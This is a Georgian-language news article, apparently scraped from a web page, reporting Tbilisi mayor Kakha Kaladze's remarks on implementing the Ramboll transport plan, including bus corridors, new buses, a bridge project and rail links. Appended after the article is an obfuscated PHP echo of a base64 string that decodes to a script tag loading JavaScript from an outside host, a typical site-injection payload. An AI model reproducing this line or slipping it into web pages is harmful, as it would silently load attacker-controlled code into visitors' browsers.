celsiusi
ავერსი შნაიდერი

 დანიური კომპანია „რამბოლის“ მიერ თბილისის სატრანსპორტო გეგმის ფარგლებში შემოთავაზებული პროექტების ნაწილზე მუშაობა უკვე დაწყებულია და აქტიურად მიმდინარეობს. ამის შესახებ თბილისის მერმა, კახა კალაძემ დღეს დედაქალაქის მთავრობის სხდომაზე განაცხადა.

„ჩვენთვის ძალიან მნიშვნელოვანია სატრანსპორტო პოლიტიკა და რეფორმა, რომელსაც მუნიციპალიტეტი ამ მიმართულებით ახორციელებს. გადადგმულია კონკრეტული ნაბიჯები და პროცესი მიმდინარეობს. თბილისის მერიის დაკვეთითა და აზიის განვითარებისა და რეკონსტრუქციის ბანკის დაფინანსებით, დანიურმა კომპანია „რამბოლმა“ სამი წლის განმავლობაში იმუშავა თბილისის სატრანსპორტო გეგმაზე. სამუშაოები დასრულდა და წარმოდგენილია დოკუმენტის საბოლოო ვარიანტი, რომელიც შეიცავს რიგ სარეკომენდაციო ხასიათის პროექტებსა და ღონისძიებებს, რომელთა მიზანია დედაქალაქში მდგრადი სატრანსპორტო სისტემის შემდგომი განვითარება 20-წლიან პერსპექტივაში. შემოთავაზებული პროექტების ნაწილზე მუშაობა უკვე დაწყებულია და აქტიურად მიმდინარეობს. მაგალითად, ასეთია თბილისის ავტობუსის სატრანზიტო დერეფნის პროექტი, რომლის ფარგლებში ეწყობა საავტობუსო ინფრასტრუქტურა და შევისყიდეთ 18-მეტრიანი ავტობუსები, რომელიც ეტაპობრივად მიეწოდება დედაქალაქს“, – განაცხადა კახა კალაძემ.

მისივე თქმით, მსოფლიო ბანკთან თანამშრომლობით მიმდინარეობს დადიანის ქუჩისა და სადგურის მოედნის დამაკავშირებელი ხიდის პროექტირების სამუშაოები.

როგორც მერმა აღნიშნა, პროექტი გულისხმობს სადგურის მოედნის განახლებასა და საავტომობილო კავშირის შექმნას, რომელიც პრიორიტეტს საზოგადოებრივ ტრანსპორტს მიანიჭებს.

გარდა ამისა, მისი განცხადებით, ეწყობა ჭკვიანი სატრანსპორტო სისტემა, რომელიც შეამცირებს გადაადგილების დროს როგორც ავტობუსებისთვის, ისე კერძო ავტომობილებისთვის.

ამასთან, თბილისის მერის თქმით, თითოეული შემოთავაზებული პროექტისთვის გათვალისწინებულია მიზანშეწონილობის კვლევა, შესაბამისად, ყველა მათგანისთვის უნდა ჩატარდეს გავლენების ანალიზი. სხდომაზე კალაძემ იმ პროექტებზეც ისაუბრა, რომლებსაც აღნიშნული სტრატეგია მოიცავს.

„სტრატეგია მოიცავს ისეთ უპრეცედენტო პროექტებს, როგორებიცაა დიდი დიღმის კავშირი ქალაქის ცენტრთან სწრაფი და კომფორტული სარკინიგზო ტრანსპორტით – ეს შეიძლება იყოს ტრამვაი ან მეტრო. ზოგადად, დიდი დიღმიდან გამოსვლა დიდი პრობლემას წარმოადგენს, ისეა გადატვირთული აღმაშენებლის ხეივანი. ეს ასევე პრობლემაა საზოგადოებრივი ტრანსპორტისთვის. შესაბამისად, ჩვენ ვგეგმავთ გარკვეულ ღონისძიებებს, მას შემდეგ, რაც წერეთლის გამზირის სარეაბილიტაციო სამუშაოები დასრულდება და მოძრაობა ორმხრივად აღდგება. იმისთვის, რომ დიდი დიღმის მოსახლეობას ხელი შევუწყოთ, რომ გამოსვლა მოახერხონ და საზოგადოებრივი ტრანსპორტი არ იყოს გაჭედილი აღმაშენებლის ხეივანში, აუცილებელია საავტობუსე ზოლების მოწყობა. ეს ასევე საჭიროა მარშალ გელოვანის გამზირზე“, – განაცხადა კახა კალაძემ.

სხდომაზე მერმა დაავალა ვიცე-მერ ირაკლი ხმალაძესა და ტრანსპორტისა და ურბანული განვითარების სააგენტოს ხელმძღვანელს, ვიქტორ წილოსანს, დაიწყონ მუშაობა სამოქმედო გეგმაზე, გაწერონ რეკომენდებულ ღონისძიებებზე მუშაობის დაწყების თარიღები, ხოლო შედეგები საზოგადოებას წარუდგინონ.

„მესმის, რომ ამას გარკვეული დრო დაჭირდება, თუმცა დროა, დავიწყოთ მუშაობა ამ მიმართულებით. თუ საჭირო იქნება დამატებით ექსპერტების აყვანა, მოვიწვიოთ უცხოელი ექსპერტები, ჩვენ გვაქვს ამის გამოცდილება. დღესაც მუნიციპალიტეტში ამ მიმართულებით მუშაობენ ადამიანები, გვყავს საერთაშორისო კომპანიები და აუცილებლად უნდა ვიმოქმედოთ“, – განაცხადა კახა კალაძემ.

411
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");